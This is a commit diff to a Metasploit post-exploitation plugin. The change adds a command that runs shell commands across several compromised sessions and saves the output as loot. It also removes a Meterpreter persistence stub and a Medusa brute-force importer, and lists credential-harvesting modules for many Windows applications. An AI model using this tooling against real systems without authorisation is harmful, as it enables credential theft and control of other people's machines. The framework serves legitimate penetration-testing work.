updated with new command

darkoperator · Sep 29, 2011 · 8be3edb · 8be3edb
1 parent 1233f4f
commit 8be3edb
Showing 1 changed file with 65 additions and 78 deletions.
diff --git a/post_auto.rb b/post_auto.rb
@@ -19,8 +19,6 @@
 # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
 # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
 # OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-# NOTE: Change later name of module and break commands by type.
 module Msf
 class Plugin::Postauto < Msf::Plugin
 	class PostautoCommandDispatcher
@@ -36,81 +34,73 @@ def commands
 				'multi_post_rc'      => "Run resource file with post modules and options against specified sessions.",
 				'multi_meter_cmd'    => "Run a Meterpreter Console Command against specified sessions.",
 				'multi_meter_cmd_rc' => "Run resource file with Meterpreter Console Commands against specified sessions.",
+				"multi_cmd"          => "Run shell command against several sessions",
 				"sys_creds"          => "Run system password collection modules against specified sessions.",
-				"app_creds"          => "Run application password collection modules against specified sessions.",
-				#"import_medusa"      => "Import output file generated by Medussa Bruteforce tool.",
-				#"persist_mem"        => "Add Meterpreter Reverse HTTPS memory persistan payload to specified sessions.",
-				#"persist_file"       => "Add Meterpreter Reverse HTTPS boot persistant payload to specified sessions."
+				"app_creds"          => "Run application password collection modules against specified sessions."
 
 			}
 		end
-
-		def cmd_persist_mem(*args)
+		# Multi shell command
+		def cmd_multi_cmd(*args)
+			# Define options
 			opts = Rex::Parser::Arguments.new(
-				"-s"   => [ true,	"Sessions to run modules against. Example <all> or <1,2,3,4>"],
-				"-l"   => [ true,   "Comma separated list of IP's to receive connection."],
-				"-p"   => [ true,   "Port for reverse connection. Default 8443."],
-				"-hd"  => [ false,  "Start handler for connection."],
+				"-s"   => [ true,	"Comma separated list of essions to run modules against."],
+				"-c"   => [ true,	"Shell command to run."],
+				"-p"   => [ true,	"Platform to run the command against. If none given it will run against all."],
 				"-h"   => [ false,  "Command Help"]
 			)
-			meter_payload = "windows/meterpreter/reverse_https"
-			rport = 8443
-			start_handler = false
-			ip_list = nil
-			sessions = nil
-		end
-
 
-		# browser_creds Command
-		# Note need to finish
-		#-------------------------------------------------------------------------------------------
-		def cmd_import_medusa(*args)
-			opts = Rex::Parser::Arguments.new(
-				"-f"   => [ true,	"Medusa output file to import."],
-				"-h"   => [ false,  "Command Help"]
-			)
-			out_file = nil
-			entries = ""
+			# set variables for options
+			sessions = []
+			command = ""
+			plat = ""
+			# Parse options
 			opts.parse(args) do |opt, idx, val|
 				case opt
-				when "-f"
-					out_file = val
-					if not ::File.exists?(script)
-						print_error "Resource File does not exists!"
-						return
-					else
-						::File.open(out_file, "r").each_line do |line|
-							# Empty line
-							next if line.strip.length < 1
-							# Comment
-							next if line[0,1] == "#"
-							entries << line.chomp
+					when "-s"
+						if val =~ /all/i
+							sessions = framework.sessions.keys
+						else
+							sessions = val.split(",")
 						end
-					end
-				when "-h"
-					print_line opts.usage
-					return
+
+					when "-c"
+						command = val
+					when "-p"
+						plat = val
+					when "-h"
+						print_line(opts.usage)
+						return
 				end
 			end
-			entries.each_line do |l|
-				if l =~ /SUCCESS/
-					service,host,user,pass = l.scan(/\[(\w*)\]\sHost\:\s(\S*)\sUser\:\s(\S*)\sPassword\:\s(\S*)\s\[SUCCESS\]/)[0]
-					case service
-					when /ssh/
-						port = 22
-						srv = service
-					when /smbnt/
-						port = 445
-						srv = 'smb'
+
+			# Make sure that proper values where provided
+			if not sessions.empty? and not command.empty?
+				# Iterate thru the session IDs
+				sessions.each do |s|
+					# Set the session object
+					session = framework.sessions[s.to_i]
+					if session.platform =~ /#{plat}/i || plat.empty?
+						host = session.tunnel_peer.split(":")[0]
+						print_status("Running #{command} against session #{s}")
+						# Run the command
+						cmd_out = session.shell_command_token(command)
+						# Print good each line of the command output
+						cmd_out.each_line do |l|
+							print_good(l.chomp)
+						end
+						file_name = "#{File.join(Msf::Config.loot_directory,"#{Time.now.strftime("%Y%m%d%H%M%S")}_command.txt")}"
+						framework.db.report_loot({ :host=> host,
+								:path=> file_name,
+								:ctype=> "text/plain",
+								:ltype=> "host.command.shell",
+								:data=> cmd_out,
+								:name=>"#{host}.txt",
+								:info=> "Output of command #{command}" })
 					end
-					auth =
-						{
-							:host => host, :port => port, :sname => srv,
-							:user => user, :pass => pass,
-							:type => 'password', :active => true
-						}
-					framework.db.report_auth_info(auth)
 				end
+			else
+				print_error("You must specify both a session and a command!")
 			end
 
 		end
@@ -124,21 +114,18 @@ def cmd_app_creds(*args)
 			)
 
 			cred_mods = [
-				{"mod" => "windows/gather/credentials/nimbuzz", "opt" => nil},
-				{"mod" => "windows/gather/credentials/trillian", "opt" => nil},
-				{"mod" => "windows/gather/credentials/smartftp", "opt" => nil},
-				{"mod" => "windows/gather/credentials/filezilla_server", "opt" => nil},
-				{"mod" => "windows/gather/credentials/wsftp_client", "opt" => nil},
-				{"mod" => "windows/gather/credentials/coreftp", "opt" => nil},
-				{"mod" => "windows/gather/credentials/winscp", "opt" => nil},
-				{"mod" => "windows/gather/credentials/vnc", "opt" => nil},
-				{"mod" => "windows/gather/credentials/mremote", "opt" => nil},
-				{"mod" => "windows/gather/credentials/total_commander", "opt" => nil},
-				{"mod" => "windows/gather/credentials/idm", "opt" => nil},
-				{"mod" => "windows/gather/credentials/flashfxp", "opt" => nil},
-				{"mod" => "windows/gather/credentials/imail", "opt" => nil},
-				{"mod" => "windows/gather/credentials/outlook", "opt" => nil},
-				{"mod" => "windows/gather/credentials/enum_meebo_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_coreftp_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_flashfxp_pwd", "opt" => nil},
+				{"mod" => "windows/gather/enum_idm_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_imail_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_mremote_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_nimbuzz_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_outlook_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_smartftp_pwd", "opt" => nil},
+				{"mod" => "windows/gather/enum_trillian_pwds", "opt" => nil},
+				{"mod" => "windows/gather/enum_vnc_pw", "opt" => nil},
+				{"mod" => "windows/gather/enum_winscp_pwds", "opt" => nil},
+				{"mod" => "windows/gather/wsftp_client_creds", "opt" => nil},
 				{"mod" => "multi/gather/pidgin_cred", "opt" => nil},
 				{"mod" => "multi/gather/filezilla_client_cred", "opt" => nil},
 				{"mod" => "multi/gather/ssh_creds", "opt" => nil},
@@ -512,4 +499,4 @@ def desc
 		"Plugin for Post-Exploitation automation."
 	end
 end
-end
+end